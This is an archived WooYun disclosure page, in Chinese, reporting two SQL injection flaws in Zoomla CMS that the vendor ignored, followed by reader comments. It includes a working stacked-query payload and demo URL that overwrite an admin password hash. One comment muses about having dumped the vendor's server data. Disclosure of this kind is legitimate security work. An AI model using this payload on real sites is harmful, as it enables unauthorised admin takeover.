漏洞概要
关注数(24)
关注此漏洞
漏洞标题:逐浪CMS通用型SQL注入4+5
提交时间:2013-11-19 02:40
修复时间:2014-02-14 02:40
公开时间:2014-02-14 02:40
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情
披露状态:
2013-11-19: 细节已通知厂商并且等待厂商处理中
2013-11-24: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-01-18: 细节向核心白帽子及相关领域专家公开
2014-01-28: 细节向普通白帽子公开
2014-02-07: 细节向实习白帽子公开
2014-02-14: 细节向公众公开
简要描述:
对于厂商那么自信说“这些漏洞都是老漏洞,之前就修复了”这种给力的态度,决定再提交两个吧,当完结篇,同时为了不浪费大家打开页面的时间,就都放在一个里面提交了!
第一个注入点同样是可以直接update的;
第二个注入点还是绕过他那坑爹的“防注入”的。
详细说明:
注入点1:
http://demo.zoomla.cn/User/Pages/ViewSmallPub.aspx?Pubid=3&ID=1
Button3_Click
添加一个回复
Item= 1); update zl_manager set adminpassword='c4ca4238a0b923820dcc509a6f75849b' where adminname='testuser';--
HiddenTable同为可控参数。
漏洞证明:
注入点2:
还是注册页面的啊………………
http://zoomla.cn/User/Register.aspx
找到对应的DLL,发现里面有检查用户名的函数:
继续进入到buser.IsExit
看到这就感觉可能会有SQL注入了,进入Sql.IsExists:
里面防注入的绕过方法看 WooYun: 逐浪CMS通用型SQL注入3
不再多复述了。
修复方案:
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-02-14 02:40
厂商回复:
最新状态:
暂无
漏洞评价:
评论
-
2013-10-29 11:27 |
梧桐雨 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)
一看逐浪 我就想起了wefgod 再回头看看,果然是洞主!关注关注
-
2013-10-29 11:29 |
Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)
-
2013-10-29 11:39 |
梧桐雨 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)
@Passer_by 没事~我相信洞主不差那点钱 发乌云远比数字更有价值
-
2013-10-29 12:56 |
Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)
-
2013-10-29 13:27 |
一只猿 ( 普通白帽子 | Rank:463 漏洞数:89 | 硬件与无线通信研究方向)
-
2013-10-29 19:09 |
在路上 ( 普通白帽子 | Rank:193 漏洞数:13 | 在学习的路上、在成长的路上...)
-
2013-10-30 10:03 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
-
2013-10-30 10:04 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
-
2013-10-30 10:10 |
Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)
@wefgod 你妹,你不伟大谁伟大?快点给我换遥控飞机
-
2013-10-30 14:28 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
-
2013-10-30 14:40 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
@梧桐雨 @一只猿 @在路上 @Passer_by 逐浪好像来注册了! @逐浪CMS /corp_detail.php?corp=%E9%80%90%E6%B5%AACMS
-
2013-10-30 15:40 |
Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)
-
2013-10-30 16:36 |
闪电小子 ( 实习白帽子 | Rank:63 漏洞数:5 | PKAV技术宅社区!---闪电小子!)
注入按斤算,任意文件下载,目录浏览,文件删除,还有神马getshell。应有尽有。。
-
2013-10-30 22:44 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
-
2013-10-30 22:53 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
-
2013-10-31 21:06 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
-
2013-11-06 16:26 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
-
2013-11-06 19:37 |
在路上 ( 普通白帽子 | Rank:193 漏洞数:13 | 在学习的路上、在成长的路上...)
-
2013-11-18 09:32 |
士大夫 ( 实习白帽子 | Rank:88 漏洞数:37 | 杭州WEB安全小组)
-
2013-11-19 09:50 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
@疯狗 是不是厂商没收到邮件或者是现在这个状态厂商无法确认了…………
-
2013-11-19 11:50 |
疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
-
2013-11-20 10:46 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
@疯狗 哦这样吗,确认了一个原来忽略的,给了1rank哈哈。目前后面还没看见消息。
-
2013-11-21 18:38 |
建建滴忘问 ( 路人 | Rank:0 漏洞数:1 | 码农And红客)
-
2013-11-22 18:51 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
@建建滴忘问 反正都是忽略。之前他们的拿shell方法太多了。
-
2013-12-02 15:21 |
建建滴忘问 ( 路人 | Rank:0 漏洞数:1 | 码农And红客)
@wefgod 唉 说出来都是泪啊……当初怎么就没把他的服务器数据统统打包呢!
-
2013-12-02 15:47 |
疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
@建建滴忘问 万万不可啊 会慢慢跟厂商沟通重视安全
-
2013-12-03 10:05 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
-
2013-12-03 19:22 |
疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
@wefgod 吃水不忘挖井人啊,去朋友圈给宣传个?
-
2013-12-04 09:10 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
@疯狗 哈哈,低调点。朋友圈没有太多可以来乌云混的人……有的话他们都知道的